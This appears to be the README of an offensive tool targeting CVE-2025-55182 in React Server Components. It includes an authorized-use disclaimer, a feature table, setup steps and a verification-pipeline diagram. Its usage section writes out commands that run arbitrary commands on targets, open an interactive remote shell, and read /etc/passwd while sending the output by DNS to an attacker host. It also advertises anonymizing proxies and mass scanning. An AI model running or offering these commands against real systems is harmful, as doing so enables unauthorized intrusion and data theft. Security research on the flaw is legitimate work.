
Advanced React Server Components RCE scanner for CVE-2025-55182. Features: multi-stage fingerprinting, vulnerability verification, DNS exfiltration, interactive shell, payload obfuscation, and professional reporting (JSON/HTML/PDF). Authorized testing only.
**This tool is engineered exclusively for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes.**Unauthorized utilization of this software against targets without prior written consent constitutes a violation of international computer crime laws, including the Computer Fraud and Abuse Act (CFAA), GDPR mandates, and standard terms of service agreements. The author and contributors disclaim all liability for any misuse, illegal operations, or consequential damages resulting from this program.Proceed strictly at your own risk.
ReactRCE-Scanner is an enterprise-grade security assessment and verification framework designed specifically for CVE-2025-55182 [1], a critical Remote Code Execution (RCE) vulnerability affecting React Server Components across versions 19.0.0 through 19.2.0.
The framework bridges the gap between theoretical vulnerability research and practical security validation. By incorporating multi-stage fingerprinting, rigorous false-positive reduction, advanced payload obfuscation, and automated multi-format reporting, it provides security engineers with precise diagnostic capabilities.
| Usage | Scan Results |
|---|---|
| Feature Category | Implementation Highlight | Operational Status |
|---|---|---|
| Smart Fingerprinting | Multi-source framework and version detection with confidence scoring algorithms. | β |
| Multi-Stage Verification | 5-stage validation pipeline designed to systematically eliminate false positives. | β |
| Payload Generation | Obfuscated payload builder supporting DNS exfiltration and multi-encoding. | β |
| Interactive Shell | Real-time pseudo-interactive command execution and shell access on verified targets. | β |
| Comprehensive Reporting | Automated report generation in JSON, HTML, PDF, and Markdown formats. | β |
| DNS Exfiltration | Out-of-band command output exfiltration via secure DNS query handling. | β |
| Concurrency Engine | High-performance multi-threaded scanning architecture for large attack surfaces. | β |
| Proxy Integration | HTTP/HTTPS and SOCKS proxy support for anonymized assessment traffic. | β |
Clone the repository and initialize the environment utilizing the automated setup script or manual dependency installation:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
The framework operates via a modular CLI architecture supporting single-target validation, bulk scanning from file lists, interactive shell spawning, and compliance reporting.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
The framework performs deep reconnaissance prior to payload delivery. It analyzes multiple HTTP header fields (X-Powered-By, Next-Action, RSC ), HTML structural meta tags (data-reactroot, __NEXT_DATA__), static build assets, and JavaScript source bundles [2] [3].
Confidence scores are categorized into four tiers:
CRITICAL (95%+): Multiple orthogonal indicators confirm vulnerable React Server Component runtime versions.
HIGH (75β95%): Strong structural indicators identified with exact version matching.
MEDIUM (50β75%): Partial framework markers present; manual verification required.
LOW (<50%): Weak heuristics detected; high probability of false positive.
To maintain operational integrity and prevent unintended service disruptions, payloads pass through a strict validation pipeline before any exploitation phase is unlocked.
Target URL / Endpoint
β
βΌ
[Stage 1] Framework & Header Detection
β
βΌ
[Stage 2] Component Version Analysis
β
βΌ
[Stage 3] Protocol Compatibility Check
β
βΌ
[Stage 4] Non-Destructive Safe Validation Request
β
βΌ
[Stage 5] Statistical Confidence Scoring
β
βΌ
Vulnerability Assessment Decision